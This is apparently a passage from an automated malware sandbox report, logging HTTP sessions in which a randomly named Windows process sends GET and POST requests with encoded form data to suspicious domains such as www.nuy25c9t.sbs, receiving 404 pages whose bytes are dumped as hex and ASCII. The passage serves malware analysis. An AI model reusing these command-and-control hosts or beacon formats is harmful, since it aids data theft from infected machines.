                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                                                  Nov 20, 2024 08:33:45.061909914 CET224INData Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                                                                                  Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)"
                                                                                  Nov 20, 2024 08:33:45.061964989 CET1236INData Raw: 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69
                                                                                  Data Ascii: style="display:inline;fill:#000000;fill-opacity:1;stroke:#000000;stroke-width:0.1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" d="m 145.0586,263.51309 c -90.20375,-0.0994 -119.20375,-0.0994 -119.20375,-0.09
                                                                                  Nov 20, 2024 08:33:45.062011003 CET1236INData Raw: 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 34 39 36 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22
                                                                                  Data Ascii: ;stroke-opacity:1;" /> <path id="path4496" d="m 85.115421,100.5729 c -0.0036,3.37532 -0.0071,6.75165 -0.0107,10.12897 m 0.512159,0.18258 c -1.914603,-0.23621 -3.505591,1.17801 -4.861444,2.68113 -1.355853,1.5
                                                                                  Nov 20, 2024 08:33:45.062043905 CET1236INData Raw: 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 31 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 37 34 2e 36 38 37 35 2c 31 32 35 2e 30 33 37
                                                                                  Data Ascii: ;" /> <path id="path4513" d="m 74.6875,125.03748 c -8.394789,7.68654 -16.790624,15.37405 -23.988969,22.38484 -7.198345,7.0108 -13.197555,13.3433 -18.781379,20.01048 -5.583823,6.66719 -10.749655,13.66605 -13.
                                                                                  Nov 20, 2024 08:33:45.062077999 CET672INData Raw: 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a
                                                                                  Data Ascii: #000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4521" d="m 96.8125,126.22498 c 6.89586,6.45836 13.7917,12.9167 19.98957,19.14581 6.19786,6.22912 11.6978
                                                                                  Nov 20, 2024 08:33:45.062149048 CET1236INData Raw: 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 39 31 2e 39 33 37 35 2c 31 32 34 2e 30 39 39 39 38 20
                                                                                  Data Ascii: /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012,6.00017 9.58322,13.49984 12.66653,18.58299 3.08
                                                                                  Nov 20, 2024 08:33:45.062184095 CET1236INData Raw: 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34 2e 30 36 35 30 30 35 2c 31 36 2e 30 32 35 30 31 20 31 2e 32 33 37 34 38 2c 34 2e 38 33 32 20 31 2e 38 32 36 36 38 2c 37 2e 34 32 34 34 37 20 32
                                                                                  Data Ascii: 943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53.62015 -0.94282,19.50478 -2.003429,37.18159 -3.0
                                                                                  Nov 20, 2024 08:33:45.062217951 CET448INData Raw: 35 34 2e 32 30 37 36 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                                                                  Data Ascii: 54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4549" d="m 79.25478,124.23266 c -5.440192,
                                                                                  Nov 20, 2024 08:33:45.062401056 CET1236INData Raw: 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74
                                                                                  Data Ascii: 95,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="pa
                                                                                  Nov 20, 2024 08:33:45.067126989 CET1236INData Raw: 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36 38 37 35 2c 35 35 2e 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65
                                                                                  Data Ascii: 45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717" rx="2.5"


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  32192.168.2.650021203.161.46.205803320C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 20, 2024 08:33:47.063721895 CET556OUTGET /4pih/?9xn=fHadNpk8MVax&GR54yHZ8=ZmPwAj1McUpIZiz0LuViOUq+B7yzDKheiuLx3j/o2iG3zDrxD498zlZSm94ILhpOzlwyZVIuLGPVSJZjqSUFLPfqxdekucT9Chqzy6Pm+Rnw0xtYs44Mkmek35mpNA+VZaQoqJ0= HTTP/1.1
                                                                                  Host: www.housew.website
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Nov 20, 2024 08:33:47.637972116 CET1236INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 20 Nov 2024 07:33:47 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 16052
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                                                  Nov 20, 2024 08:33:47.637990952 CET1236INData Raw: 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34
                                                                                  Data Ascii: /linearGradient> </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)"
                                                                                  Nov 20, 2024 08:33:47.638000965 CET448INData Raw: 37 39 20 2d 30 2e 35 39 35 32 33 33 2c 2d 31 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34
                                                                                  Data Ascii: 79 -0.595233,-18.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;str
                                                                                  Nov 20, 2024 08:33:47.638020992 CET1236INData Raw: 30 31 20 2d 34 2e 38 36 31 34 34 34 2c 32 2e 36 38 31 31 33 20 2d 31 2e 33 35 35 38 35 33 2c 31 2e 35 30 33 31 32 20 2d 32 2e 34 37 33 37 36 34 2c 33 2e 30 39 31 37 33 20 2d 33 2e 33 38 37 38 36 36 2c 34 2e 35 39 35 33 38 20 2d 30 2e 39 31 34 31
                                                                                  Data Ascii: 01 -4.861444,2.68113 -1.355853,1.50312 -2.473764,3.09173 -3.387866,4.59538 -0.914103,1.50365 -1.620209,2.91586 -2.416229,4.41952 -0.79602,1.50365 -1.67928,3.09352 -0.808656,3.24054 0.870624,0.14702 3.490408,-1.14815 5.700074,-1.91396 2.209666,
                                                                                  Nov 20, 2024 08:33:47.638031960 CET1236INData Raw: 33 2c 36 2e 36 36 37 31 39 20 2d 31 30 2e 37 34 39 36 35 35 2c 31 33 2e 36 36 36 30 35 20 2d 31 33 2e 39 31 36 36 30 38 2c 31 38 2e 37 34 39 36 20 2d 33 2e 31 36 36 39 35 32 2c 35 2e 30 38 33 35 35 20 2d 34 2e 33 33 33 34 33 32 2c 38 2e 32 34 39
                                                                                  Data Ascii: 3,6.66719 -10.749655,13.66605 -13.916608,18.7496 -3.166952,5.08355 -4.333432,8.24971 -4.750315,11.08369 -0.416883,2.83399 -0.08368,5.33304 1.809372,16.25302 1.893048,10.91998 5.343489,30.24673 9.760132,48.66349 4.416642,18.41676 9.798356,35.91
                                                                                  Nov 20, 2024 08:33:47.638123035 CET448INData Raw: 37 2c 31 39 2e 31 34 35 38 31 20 36 2e 31 39 37 38 36 2c 36 2e 32 32 39 31 32 20 31 31 2e 36 39 37 38 39 2c 31 32 2e 32 32 39 31 34 20 31 37 2e 31 31 34 35 36 2c 31 38 2e 33 39 35 38 31 20 35 2e 34 31 36 36 36 2c 36 2e 31 36 36 36 37 20 31 30 2e
                                                                                  Data Ascii: 7,19.14581 6.19786,6.22912 11.69789,12.22914 17.11456,18.39581 5.41666,6.16667 10.74996,12.49995 14.74993,17.91655 3.99997,5.41659 6.66659,9.91653 7.16671,17.83316 0.50012,7.91664 -1.16644,19.24921 -3.3502,31.24619 -2.18376,11.99698 -4.81616,2
                                                                                  Nov 20, 2024 08:33:47.638195038 CET1236INData Raw: 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 39 31 2e
                                                                                  Data Ascii: ke-opacity:1;" /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012,6.00017 9.58322,13.49984 12.6665
                                                                                  Nov 20, 2024 08:33:47.638235092 CET1236INData Raw: 30 32 31 2c 31 31 2e 31 31 30 35 32 20 30 2e 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34 2e 30 36 35 30 30 35 2c 31 36 2e 30 32 35 30 31 20 31 2e 32 33 37 34 38 2c 34 2e 38 33 32 20 31 2e
                                                                                  Data Ascii: 021,11.11052 0.943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53.62015 -0.94282,19.50478 -2.00342
                                                                                  Nov 20, 2024 08:33:47.638246059 CET448INData Raw: 30 30 30 34 39 20 33 2e 37 31 32 30 30 35 2c 35 34 2e 32 30 37 36 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30
                                                                                  Data Ascii: 00049 3.712005,54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4549" d="m 79.25478,124.232
                                                                                  Nov 20, 2024 08:33:47.638315916 CET1236INData Raw: 33 34 2e 34 36 39 31 37 20 35 2e 30 36 36 30 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a
                                                                                  Data Ascii: 34.46917 5.066095,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path
                                                                                  Nov 20, 2024 08:33:47.643045902 CET1236INData Raw: 32 38 39 2c 31 38 2e 34 31 35 35 20 2d 38 2e 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36 38 37 35 2c 35 35 2e 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66
                                                                                  Data Ascii: 289,18.4155 -8.45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717"


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  33192.168.2.65002243.155.76.124803320C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 20, 2024 08:33:53.857135057 CET810OUTPOST /lmj1/ HTTP/1.1
                                                                                  Host: www.nuy25c9t.sbs
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Connection: close
                                                                                  Content-Length: 213
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  Origin: http://www.nuy25c9t.sbs
                                                                                  Referer: http://www.nuy25c9t.sbs/lmj1/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Data Raw: 47 52 35 34 79 48 5a 38 3d 45 77 46 52 66 64 34 71 34 5a 4e 50 4b 63 6d 41 6a 74 55 6c 51 41 4c 48 48 30 59 46 6a 34 77 37 49 51 57 4a 50 57 39 58 38 67 57 30 59 42 62 6f 30 68 51 70 47 71 44 35 4d 45 4c 63 52 4a 64 49 6a 57 6f 79 44 4d 51 67 54 48 31 73 4f 62 6b 30 6b 57 72 59 66 67 47 52 51 78 62 6f 70 64 5a 4b 63 50 74 54 6d 54 6f 47 52 59 5a 51 65 49 63 4e 78 54 65 49 6f 48 35 7a 61 2f 5a 6f 6c 38 68 54 79 47 79 62 30 55 37 31 41 6c 49 5a 79 75 46 64 49 4b 55 72 49 6b 62 4e 55 32 44 43 62 79 44 71 6c 67 4e 32 71 68 51 4b 53 57 64 52 38 4b 46 52 78 72 73 43 74 74 38 35 43 48 31 30 46 49 6a 72 74 53 50 56 61 4a 51 52 6a 6e 55 6b
                                                                                  Data Ascii: GR54yHZ8=EwFRfd4q4ZNPKcmAjtUlQALHH0YFj4w7IQWJPW9X8gW0YBbo0hQpGqD5MELcRJdIjWoyDMQgTH1sObk0kWrYfgGRQxbopdZKcPtTmToGRYZQeIcNxTeIoH5za/Zol8hTyGyb0U71AlIZyuFdIKUrIkbNU2DCbyDqlgN2qhQKSWdR8KFRxrsCtt85CH10FIjrtSPVaJQRjnUk
                                                                                  Nov 20, 2024 08:33:54.729610920 CET708INHTTP/1.1 404 Not Found
                                                                                  Server: Tuser
                                                                                  Date: Wed, 20 Nov 2024 07:33:54 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Content-Length: 548
                                                                                  Connection: close
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  34192.168.2.65002343.155.76.124803320C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 20, 2024 08:33:56.402523994 CET834OUTPOST /lmj1/ HTTP/1.1
                                                                                  Host: www.nuy25c9t.sbs
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Connection: close
                                                                                  Content-Length: 237
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  Origin: http://www.nuy25c9t.sbs
                                                                                  Referer: http://www.nuy25c9t.sbs/lmj1/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Data Raw: 47 52 35 34 79 48 5a 38 3d 45 77 46 52 66 64 34 71 34 5a 4e 50 4d 39 57 41 77 37 63 6c 41 51 4c 41 65 45 59 46 74 59 77 2f 49 51 71 4a 50 58 35 48 38 7a 79 30 59 67 72 6f 31 67 51 70 42 71 44 35 43 6b 4c 46 65 70 64 50 6a 57 6b 41 44 4a 77 67 54 48 68 73 4f 62 55 30 6c 6c 7a 58 64 77 47 70 45 42 62 75 6e 39 5a 4b 63 50 74 54 6d 54 38 73 52 59 78 51 65 59 73 4e 7a 79 65 4c 67 6e 35 77 51 66 5a 6f 79 73 68 66 79 47 7a 2b 30 56 6e 54 41 6e 41 5a 79 72 68 64 4a 59 38 73 47 6b 62 44 51 32 43 54 51 68 32 46 39 54 6f 57 69 67 55 57 4f 55 6f 75 30 63 59 4c 74 59 73 68 2f 39 63 37 43 46 74 47 46 6f 6a 42 76 53 33 56 49 65 63 32 73 54 78 48 57 53 56 4d 45 79 62 6f 61 4f 62 64 76 6f 78 2b 51 74 77 65 73 51 3d 3d
                                                                                  Data Ascii: GR54yHZ8=EwFRfd4q4ZNPM9WAw7clAQLAeEYFtYw/IQqJPX5H8zy0Ygro1gQpBqD5CkLFepdPjWkADJwgTHhsObU0llzXdwGpEBbun9ZKcPtTmT8sRYxQeYsNzyeLgn5wQfZoyshfyGz+0VnTAnAZyrhdJY8sGkbDQ2CTQh2F9ToWigUWOUou0cYLtYsh/9c7CFtGFojBvS3VIec2sTxHWSVMEyboaObdvox+QtwesQ==
                                                                                  Nov 20, 2024 08:33:57.270441055 CET708INHTTP/1.1 404 Not Found
                                                                                  Server: Tuser
                                                                                  Date: Wed, 20 Nov 2024 07:33:57 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Content-Length: 548
                                                                                  Connection: close
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 